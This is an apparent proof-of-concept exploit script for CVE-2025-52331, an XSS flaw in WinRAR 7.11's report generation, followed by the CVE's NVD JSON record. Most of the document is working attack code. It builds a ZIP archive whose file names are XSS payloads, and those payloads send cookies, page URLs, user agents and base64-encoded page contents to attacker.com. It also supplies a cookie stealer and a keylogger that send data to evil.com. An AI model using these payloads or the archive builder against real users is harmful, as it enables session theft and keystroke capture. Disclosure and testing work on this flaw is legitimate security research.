CVE-2025-52331

# CVE-2025-52331 PoC - WinRAR 7.11 XSS in Generate Report # This PoC demonstrates the XSS vulnerability in WinRAR's report generation import zipfile import os def create_malicious_rar(): """ Create a malicious archive file that contains XSS payloads in filenames """ malicious_filenames = [ '<img src=x onerror=fetch(`https://attacker.com/?c=${document.cookie}`)>.txt', '<script>new Image().src=`https://attacker.com/?u=${window.location.href}&n=${navigator.userAgent}`</script>', '<svg/onload=fetch(`https://attacker.com/?i=${document.domain}`)>', '<iframe src="javascript:fetch(`https://attacker.com/?data=${btoa(document.body.innerHTML)}`)">' ] # Create a ZIP file (WinRAR can open ZIP files) with zipfile.ZipFile('malicious_archive.zip', 'w') as zipf: for i, filename in enumerate(malicious_filenames): # Add a file with the malicious filename content = f'Normal file content {i}' zipf.writestr(filename, content) print('[+] Created malicious_archive.zip with XSS payloads in filenames') print('[+] When user generates report and opens HTML, XSS will execute') def generate_xss_payload(): """ Generate various XSS payloads for testing """ payloads = { 'cookie_stealer': '<img src=x onerror="fetch(`https://evil.com/?c=${document.cookie}`)">', 'info_disclosure': '<script>fetch(`https://evil.com/?u=${navigator.userAgent}&h=${window.location.href}`)</script>', 'dom_manipulation': '<svg/onload="document.body.innerHTML=`<h1>Hacked</h1>`">', 'keylogger': '<script>document.onkeypress=function(e){fetch(`https://evil.com/k?${e.key}`)}</script>' } return payloads if __name__ == '__main__': print('CVE-2025-52331 WinRAR XSS PoC') print('=' * 50) create_malicious_rar() print('\n[!] User must:') print(' 1. Open the malicious archive with WinRAR 7.11') print(' 2. Use "Generate Report" feature') print(' 3. Open the generated HTML report') print(' 4. XSS payload will execute in browser context')

{"cve": {"id": "CVE-2025-52331", "sourceIdentifier": "[email protected]", "published": "2025-11-12T17:15:37.733", "lastModified": "2025-12-31T16:39:46.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation in the HTML report, which allows potentially malicious HTML tags to be injected into the report. User interaction is required. User must use the \"generate report\" functionality and open the report."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rarlab:winrar:7.11:-:*:*:*:*:*:*", "matchCriteriaId": "7495FB0B-8BAF-453A-BC8A-9056BF2E98FF"}]}]}], "references": [{"url": "https://gist.github.com/MarcinB44/2150484497c4b34aedf682c9091b14fa", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.rarlab.com/rarnew.htm", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.win-rar.com/whatsnew.html", "source": "[email protected]", "tags": ["Release Notes"]}]}}